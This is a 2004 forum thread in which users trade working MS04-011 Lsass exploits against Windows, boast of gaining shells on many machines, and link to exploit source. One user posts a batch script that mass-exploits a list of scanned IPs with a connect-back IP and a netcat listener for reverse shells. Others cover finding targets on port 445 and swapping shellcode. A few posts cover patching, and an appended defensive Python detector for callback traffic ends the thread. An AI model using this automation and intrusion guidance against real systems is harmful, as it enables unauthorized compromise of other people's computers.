2unlimited
May 2 2004, 05:47 AM
Hello to all
I found many kinds of Lsass exploits here!!!!
But they didn't work....
So which one of them works properly and is the best?
Thanks in advance
iWeasel410
May 2 2004, 05:51 AM
houseofdabus' version works perfectly fine, got a few boxes today

just use it with netcat and you're good to go
Demsta
May 2 2004, 06:19 AM
they all work.. but i use houseofdabus's version as well.. i only use this exploit for network hacking though.. the exploit needs netbios and most unis (if not all) don't let netbios run in or out.. but it does run internally

.. and i only do this to let them know they need a patch..
blahplok
May 2 2004, 06:37 AM
i think rLsasrv.exe is good, I've got a lot of shells with this exploit...
extreme83
May 2 2004, 07:21 AM
all work for me.. you can edit the code of houseofdabus to be even better..
I made an autohaxor out of it..
it works perfectly well, load list, press "GO".. over a hundred boxes till now !!
popo0421
May 2 2004, 07:36 AM
yes, I think the houseofdabus' version exploit is perfect one.
success rate is 80%.
realloader
May 2 2004, 07:42 AM
I know there are a lot of these exploits. I have many shells too!
But where can I get houseofdabus' version?
Demsta
May 2 2004, 08:13 AM
| CODE |
| http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php |
Unio
May 2 2004, 08:27 AM
| QUOTE |
| I made an autohaxor out of it.. |
can you tell me how ?
I try make autohaxor but it didn't work
thyr0x1ne
May 2 2004, 08:45 AM
Nothing really amazing as its not hardly c++ or anyting else code , but create a auto.bat file ( for example ) and put this in :
| CODE |
@echo off CLS color 70 echo ************************************************************** echo * echo * Windows Lsasrv.dll Remote Universal Exploit XP/2K (MS04-011) echo * echo **************************************************************
pause
CLS
set /p scan="[-] IPs scan filename :" echo Targets: echo -- 0 [0x01004600]: WinXP Professional [universal] lsass.exe echo -- 1 [0x7515123c]: Win2k Professional [universal] netrap.dll echo -- 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll set /p target="[-] Target :" set /p ip="[-] Connect back IP :" set /p bind="[-] BindPort :"
for /f "eol=; tokens=1*" %%i in (%scan%) do lsauniv.exe %target% %%i %bind% %ip%
CLS
echo [-] End of process , press a key ... pause
|
then put this auto.bat in the directory u have : scan.txt ( scan results ) and lsauniv.exe ( according to be the housedabus exploit compiled )
launch auto.bat after u launched netcat listening on bindport you choosed
TheRealGiant
May 2 2004, 08:48 AM
Little question:
Is there a vulnerability scanner for this vulnerability, or shall I scan port 445?
Thanks.
Ecko
May 2 2004, 09:03 AM
yes, there is a scanner named DSScan...
episode
May 2 2004, 09:11 AM
oh cool
rscience
May 2 2004, 09:38 AM
DDscan is REALLY BIG shittt !!!!!!!!!
on GovernmentSecurity.org there is already a posted autohaxor for both systems,
XP and 2000.
pr3d4ter
May 2 2004, 09:49 AM
can anyone tell me how to secure a server hacked with this bug ?
is it possible to install the mspatch in a cmd ?
eddy
May 2 2004, 10:58 AM
| QUOTE (pr3d4ter @ May 2 2004, 09:49 AM) |
can anyone tell me how to secure a server hacked with this bug ? is it possible to install the mspatch in a cmd ? |
yes it is. Download it from the MS site and run it like name.exe /quiet /forcerestart
or whatever options you want; there is a nice list of them on the MS site. Good luck.
strohunter
May 2 2004, 12:52 PM
http://support.microsoft.com/?kbid=835732
according to Microsoft, with some hardware it can crash the OS...
has anyone got this expl0it to work successfully with win2k?
dX
Borgon
May 2 2004, 05:44 PM
can someone provide me with the houseof dead win binary? I was able to port it over to linux but i would like the win32 version since i dont have vc++ to compile.
thank you
binary_hashes
May 2 2004, 06:47 PM
THE EXPLOIT IS GREAT BUT I WANT THE SAME EXPLOIT FOR PORT 139
THANKSX
EzMe
May 4 2004, 03:35 AM
| QUOTE (dxx @ May 2 2004, 04:44 PM) |
has anyone got this expl0it to work sucessfuly with win2k?
dX |
No, I can't get it to work on Win2k either...?! Donno what I'm doin wrong.. :/
Anarchiste
May 4 2004, 09:29 AM
The universal shellcode for XP works but not for Win 2k... you must replace the shellcode with a Win 2k generic shellcode.... a friend made this, but he doesn't want it leaked.. sorry
streetsurfer
May 4 2004, 02:49 PM
the first released lsass.c source will exploit win2k.
If it doesn't work it could be your outgoing port isn't working.
Check that first
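
For defenders reading this thread: the posts describe traffic to port 445 followed by a connection back from the targeted host to a listener. The following is an added example, not code from the thread or from any poster, that flags that pattern in flow records. The record format, the sample lines and the 60-second window are assumptions constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed flow records (not from the thread): time proto src:port dst:port
SAMPLE_FLOWS = """\
2004-05-02T09:00:01 TCP 203.0.113.7:3120 192.0.2.10:445
2004-05-02T09:00:03 TCP 192.0.2.10:1045 203.0.113.7:4444
2004-05-02T09:05:00 TCP 192.0.2.20:1100 192.0.2.10:445
2004-05-02T09:07:00 TCP 198.51.100.9:2200 192.0.2.11:445
2004-05-02T09:30:00 TCP 192.0.2.11:1046 198.51.100.9:80
"""

WINDOW = timedelta(seconds=60)  # assumed correlation window


def parse(line):
    """Split one record into (time, proto, src_ip, src_port, dst_ip, dst_port)."""
    ts, proto, src, dst = line.split()
    sip, sport = src.rsplit(":", 1)
    dip, dport = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), proto, sip, int(sport), dip, int(dport)


def find_connect_backs(text, window=WINDOW):
    """Return (host, peer, port) for each outbound TCP connection that a host
    opens to a peer within `window` of that peer connecting to its port 445.
    Records are assumed to be in time order."""
    inbound = {}  # (host, peer) -> time of the latest inbound 445 connection
    alerts = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, proto, sip, sport, dip, dport = parse(line)
        if proto != "TCP":
            continue
        if dport == 445:
            inbound[(dip, sip)] = ts
            continue
        seen = inbound.get((sip, dip))
        if seen is not None and timedelta(0) <= ts - seen <= window:
            alerts.append((sip, dip, dport))
    return alerts


if __name__ == "__main__":
    for host, peer, port in find_connect_backs(SAMPLE_FLOWS):
        print(f"ALERT {host} called back to {peer}:{port} after inbound 445")
```

A hit on this rule is a reason to isolate the host and check whether the KB835732 update mentioned earlier in the thread is installed.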